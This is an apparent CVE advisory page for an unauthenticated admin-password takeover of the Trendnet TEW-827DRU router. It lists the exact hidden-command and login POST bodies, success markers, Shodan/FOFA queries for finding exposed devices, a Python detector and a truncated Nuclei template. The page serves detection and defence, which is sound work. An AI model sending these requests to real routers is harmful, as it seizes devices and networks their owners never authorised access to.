CVE-2021-20158
Published 2021-12-30
Priority P274 · critical 9.8 · CVSS 3.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: EPSS 10.77% (95.3rd percentile)
Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force a change of the admin password due to a hidden administrative command.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trendnet | tew-827dru_firmware | — | — |
Detection & IOCs (extracted from sources)
- command: `ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}`
- command: `html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=`
- Detect exploit attempts by monitoring POST requests to /apply_sec.cgi containing the hidden action parameter 'tools_admin_elecom', which is the hidden administrative command used to bypass authentication and change the admin password.
- A successful exploitation results in a 200 OK HTML response body containing all of: 'setConnectDevice', 'setInternet', 'setWlanSSID', and 'TEW-827DRU'; use these as confirmation indicators after the password-change POST.
- The attack is two-stage: first POST to /apply_sec.cgi with action=tools_admin_elecom to set a new password unauthenticated, then POST again to /apply_sec.cgi with action=do_graph_auth using the newly set base64-encoded password to confirm login. Both requests require no prior session.
- Identify exposed Trendnet TEW-827DRU devices via Shodan query http.html:"TEW-827DRU" or FOFA query body="tew-827dru" to enumerate attack surface.
- The vulnerability is specific to firmware version 2.08B01 of the Trendnet TEW-827DRU (CPE: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01). Detection rules should be scoped to this firmware version to avoid false positives on patched devices.
- The exploit requires no authentication (PR:N, UI:N per CVSS), meaning any unauthenticated network request to /apply_sec.cgi with action=tools_admin_elecom is inherently suspicious and should be alerted on regardless of source IP.
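Detection logic for the two-stage pattern described in the notes above, as an added example that is not from the page's sources or the Nuclei project. It assumes request records that include the POST body and response body (as a reverse proxy or WAF would log them), in the constructed tuple shape shown; the stage-2 login action is only alerted on when the same source issued the hidden command shortly before, since do_graph_auth on its own is the device's normal login.

```python
from urllib.parse import parse_qs

# Constructed sample records: (src_ip, timestamp_s, method, path, body, response_body)
SAMPLE = [
    ("198.51.100.7", 100, "POST", "/apply_sec.cgi",
     "ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value"
     "&html_response_return_page=dummy_value&method=tools&admin_password=x",
     "<html>setConnectDevice setInternet setWlanSSID TEW-827DRU</html>"),
    ("198.51.100.7", 104, "POST", "/apply_sec.cgi",
     "html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=eA%3D%3D"
     "&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=",
     "<html>ok</html>"),
    # Ordinary (non-hidden) admin action from another host: must not alert.
    ("203.0.113.9", 200, "POST", "/apply_sec.cgi",
     "ccp_act=set&action=tools_admin&method=tools", "<html>ok</html>"),
    ("192.0.2.5", 300, "GET", "/login_pic.asp", "", "<html/>"),
]

# Response-body markers the page lists as confirmation of a successful stage 1.
SUCCESS_MARKERS = ("setConnectDevice", "setInternet", "setWlanSSID", "TEW-827DRU")

def classify(rec):
    """Return 'stage1', 'stage2' or None for one request record."""
    _src, _ts, method, path, body, _resp = rec
    if method != "POST" or path != "/apply_sec.cgi":
        return None
    action = parse_qs(body).get("action", [""])[0]
    if action == "tools_admin_elecom":   # hidden password-change command
        return "stage1"
    if action == "do_graph_auth":        # normal login; suspicious only after stage1
        return "stage2"
    return None

def detect(records, window=60):
    """Return alerts in time order. A stage1 alert carries 'confirmed' = True when
    the response held every success marker; a stage2 alert is emitted only when the
    same source sent a stage1 within `window` seconds."""
    alerts, last_stage1 = [], {}
    for rec in sorted(records, key=lambda r: r[1]):
        kind = classify(rec)
        if kind is None:
            continue
        src, ts, _, _, _, resp = rec
        if kind == "stage1":
            last_stage1[src] = ts
            alerts.append({"src": src, "kind": "stage1",
                           "confirmed": all(m in resp for m in SUCCESS_MARKERS)})
        elif src in last_stage1 and ts - last_stage1[src] <= window:
            alerts.append({"src": src, "kind": "stage2_after_stage1", "confirmed": True})
    return alerts
```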
CVSS provenance
- NVD, CVSS v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD, CVSS v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
No detection rules found.
Nuclei template: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change (nuclei · CVSS 5.3, listed as MEDIUM for CVE-2021-20158)
Template:

```yaml
id: CVE-2021-20158

info:
  name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
  author: gy741
  severity: critical
  description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
  impact: |
    An attacker with authenticated access can gain unauthorized control over the affected device.
  remediation: |
    Upgrade to the latest firmwa
```